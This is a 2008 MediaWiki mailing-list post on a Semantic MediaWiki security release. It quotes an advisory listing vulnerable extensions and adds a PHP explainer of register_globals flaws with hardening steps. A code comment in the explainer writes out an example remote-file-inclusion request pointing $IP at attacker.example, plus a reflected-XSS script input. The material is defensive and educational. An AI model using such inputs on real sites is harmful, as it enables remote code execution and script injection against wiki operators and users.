[Mediawiki-l] [Wikitech-l] Multiple security vulnerabilities in MediaWiki extensions

Markus Krötzsch mak at aifb.uni-karlsruhe.de
Sat Jun 14 14:44:11 UTC 2008


Thanks Tim! I have now backported your fixes in the current SVN version to the 
latest Semantic MediaWiki release 1.1.1. The updated release 1.1.2 can be 
obtained via Sourceforge [1] or SVN [2]. Updating existing SMW 1.1* 
installations can thus be done without moving to the development version, and 
without any additional side effects on the running wiki.

We will take care of preventing the "register_globals" issue in all future ...

Cheers,

Markus

[1] http://sourceforge.net/project/showfiles.php?group_id=147937
[2] http://svn.wikimedia.org/svnroot/mediawiki/tags/extensions/SemanticMediaWiki/


On Saturday, 14 June 2008, Tim Starling wrote:
> The following extensions had cross-site scripting (XSS) vulnerabilities:
> * geo
> * MetavidWiki
> * wikihiero
>
> These vulnerabilities are exploitable even if the extensions are
> disabled. If you have any of these extensions installed, please update
> them immediately.
>
> Many shared hosting services have the php.ini setting "register_globals"
> enabled, despite the fact that it is known to be detrimental to security.
>
> A new automated vulnerability scanner has found a large number of
> security vulnerabilities in MediaWiki extensions, when register_globals
> is enabled. Unless you are sure you have register_globals disabled, the
> following extensions should be immediately updated:
>
> Cross-site scripting vulnerabilities:
> * Call
> * ChangeAuthor
> * EditOwn
> * SignDocument
> * TemplateLink
> * WatchSubpages
> * WhoIsWatching
> * php/ext/MediaWiki
>
> Arbitrary script inclusion vulnerabilities:
> * CategoryIntersection
> * Makebot
> * PasswordReset
> * regexBlock
> * SemanticCalendar
> * SemanticForms
> * SemanticMediaWiki
> * SocialProfile
> * SpamRegex
> * StalePages
> * TodoTasks
> * WhiteList
> * Wikidata
>
> All these extensions are vulnerable regardless of whether they are
> enabled in LocalSettings.php. They only need to be installed, with their
> installation directory accessible from the public internet.
>
> Downloads in .tar.gz form for all these MediaWiki extensions are
> available from:
> http://www.mediawiki.org/wiki/Special:ExtensionDistributor
>
> Or using a subversion client from:
> http://svn.wikimedia.org/svnroot/mediawiki/trunk/extensions
>
> -- Tim Starling
>
> _______________________________________________
> Wikitech-l mailing list
> Wikitech-l at lists.wikimedia.org
> https://lists.wikimedia.org/mailman/listinfo/wikitech-l



-- 
Markus Krötzsch
Institut AIFB, Universität Karlsruhe (TH), 76128 Karlsruhe
phone +49 (0)721 608 7362          fax +49 (0)721 608 5998
mak at aifb.uni-karlsruhe.de          www  http://korrekt.org
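The mechanism behind both classes of bug in Tim's advisory (arbitrary script inclusion and XSS in extensions that are merely present on disk) is that with register_globals=On, PHP imports every query-string and POST parameter into the global scope before the requested file runs. An extension file that is hit directly over HTTP, rather than through index.php and LocalSettings.php, therefore sees attacker-controlled values in variables such as $IP that it expected the wiki to have set. The following is an added illustration written for this page, not code from any of the extensions named above; ExampleExt, ExampleExt.body.php and exampleExtAddNotice are hypothetical names. The entry-point guard on MEDIAWIKI is the convention MediaWiki extensions use to refuse direct requests.

```php
<?php
/**
 * ExampleExt.php - a hypothetical extension entry file, constructed for
 * illustration only. Assume it lives at /w/extensions/ExampleExt/ and that
 * /w/ is served to the public internet.
 *
 * VULNERABLE SHAPE (the pattern the register_globals scanner flags):
 *
 *   <?php
 *   // $IP is expected to have been set by LocalSettings.php
 *   require_once( "$IP/includes/SpecialPage.php" );      // (1)
 *   $wgOut->addHTML( "<b>$msg</b>" );                      // (2)
 *
 * With register_globals=On, a direct request such as
 *   /w/extensions/ExampleExt/ExampleExt.php?IP=http://attacker.example/
 * sets $IP from the query string before (1) runs, so the include loads
 * attacker-supplied code (remotely if allow_url_fopen/allow_url_include
 * permit it, otherwise any local path the attacker can write to).
 * Likewise ?msg=<script>... reaches (2) unescaped: reflected XSS.
 * LocalSettings.php is never consulted on that path, which is why
 * "disabled in LocalSettings.php" gives no protection at all.
 */

// HARDENED SHAPE
// 1. Refuse to execute unless loaded through a MediaWiki entry point
//    (index.php etc. define MEDIAWIKI before including LocalSettings.php).
//    A direct HTTP request to this file never has the constant, so it dies
//    before any include or output, whatever register_globals is set to.
if ( !defined( 'MEDIAWIKI' ) ) {
	echo "This file is part of a MediaWiki extension and is not a valid entry point.\n";
	die( 1 );
}

// 2. Do not build include paths from file-scope globals that
//    register_globals could have planted; anchor them to this file instead.
$dir = dirname( __FILE__ );
require_once( "$dir/ExampleExt.body.php" );   // hypothetical body file

// 3. Read request data only through $wgRequest, never via bare globals,
//    and escape it before it goes into HTML.
$wgHooks['BeforePageDisplay'][] = 'exampleExtAddNotice';

function exampleExtAddNotice( &$out ) {
	global $wgRequest;
	$msg = $wgRequest->getText( 'msg', '' );
	$out->addHTML( '<b>' . htmlspecialchars( $msg, ENT_QUOTES ) . '</b>' );
	return true;
}
```

On a host where you cannot see php.ini, `php -r 'var_dump(ini_get("register_globals"));'` run with the same PHP binary the web server uses shows whether the setting is on; a `bool(false)` or empty string means off. Updating the listed extensions is still necessary, since the guard above only helps once it is present in the files that are actually on disk.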